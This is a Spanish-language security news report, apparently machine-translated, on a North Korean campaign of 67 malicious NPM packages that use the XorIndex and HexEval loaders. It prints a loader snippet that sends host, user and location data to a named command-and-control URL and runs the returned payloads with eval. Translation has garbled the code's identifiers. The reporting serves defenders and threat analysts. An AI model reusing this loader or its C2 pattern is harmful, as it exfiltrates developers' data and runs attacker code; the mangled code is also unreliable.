Los actores de amenaza de Corea del Norte han intensificado sus ataques de cadena de suministro de software con el despliegue de 67 paquetes de NPM maliciosos que colectivamente obtuvieron más de 17,000 descargas antes de la detección.
Esta última campaña representa una expansión significativa de la operación en curso de “entrevista contagiosa”, presentando un cargador de malware previamente no informado denominado XorIndex junto con la infraestructura de cargador hexeval existente.
El recientemente descubierto malware XorIndex, llamado así por su uso distintivo de cadenas codificadas por XOR y técnicas de ofuscación basadas en índices, demuestra la evolución continua de la amenaza de los actores en el desarrollo de mecanismos de evasión sofisticados.
Los paquetes maliciosos se infiltraron en el ecosistema NPM a través de 18 cuentas diferentes registradas con 15 direcciones de correo electrónico distintas, con 27 paquetes que quedan activos en el registro al momento del descubrimiento.
Socket.dev analistas identificado Esta campaña como parte de un esfuerzo de espionaje cibernético más amplio de Corea del Norte dirigido a desarrolladores, titulares de criptomonedas y personas con acceso a credenciales delicadas.
El cargador XorIndex opera como un marco de ataque de varias etapas, inicialmente recolectando metadatos de host antes de decodificar y ejecutar el malware de segunda etapa Beavertail, que posteriormente hace referencia a la puerta trasera invisibleferret para un acceso persistente.
Línea de tiempo de las campañas de cargador HexeVal y XorIndex (fuente – Socket.dev)
La infraestructura de la campaña se basa en puntos finales de comando y control de codificación duras alojados en plataformas legítimas como VERCEL, utilizando URL como https://soc-log.vercel.app/api/ipcheck y https://log-writter.vercel.app/api/ipcheck.
Este enfoque permite a los actores de amenaza mantener la seguridad operativa al tiempo que aprovecha los servicios de alojamiento de confianza para evadir los mecanismos de detección.
El cargador XorIndex ha acumulado más de 9,000 descargas entre junio y julio de 2025, operando en paralelo con la continua campaña Hexeval que ha generado 8,000 descargas adicionales en paquetes recién descubiertos.
Este enfoque de doble vía demuestra el compromiso de los actores de amenaza de mantener múltiples vectores de ataque simultáneamente.
Mecanismo de infección de XorIndex y ejecución de código
El mecanismo de infección del cargador XorIndex comienza inmediatamente después de la instalación del paquete, aprovechando los ganchos de nodo.js posteriores a la instalación para ejecutar código malicioso sin interacción del usuario.
El malware emplea una fase de reconocimiento sofisticada, recopilando información integral del sistema que incluye nombre de host, nombre de usuario, dirección IP externa, datos de geolocalización y detalles de la plataforma antes de establecer la comunicación con los servidores de comando y control.
Un fragmento de código representativo del paquete Eth-AuditLog demuestra la funcionalidad central del cargador:-
// recopila la función de async de telemetría local (host/user/ip/geo/plataforma) recationInfo () {const ip = await publicip.v4 (); const geo = (espera axios.get (`http://ip-api.com/json/$ {ip}`)) .data; return {host: OS.HostName (), User: OS.UserInfo (). Nombre de usuario, IP, ubicación: Geo, Plataforma: OS.platform ()}; } // Envía Beacon y ejecuta las cargas útiles de JavaScript suministradas por el actor de amenaza módulo.exports = async function writer () {const info = await gatherInfo (); const versión = proceso.env.npm_package_version; axios.post (“https://log-writter.vercel.app/api/ipcheck”, {… info, versión}) .then (res => {eval (res.data.s1); // ejecutar la carga útil primaria eval (res.data.s2); // ejecutar la carga útil secundaria opcional}); };
La evolución del cargador desde prototipos básicos hasta malware sofisticado demuestra un avance deliberado en las técnicas de ofuscación, que progresa desde simples capacidades de ejecución de código remoto hasta perfiles de sistema integrales y rotación de comandos de punto múltiple, posicionándolo como una amenaza formidable para la seguridad de la cadena de suministro de software.
Investigue el comportamiento de malware en vivo, rastree cada paso de un ataque y tome decisiones de seguridad más rápidas y inteligentes -> Prueba cualquiera.
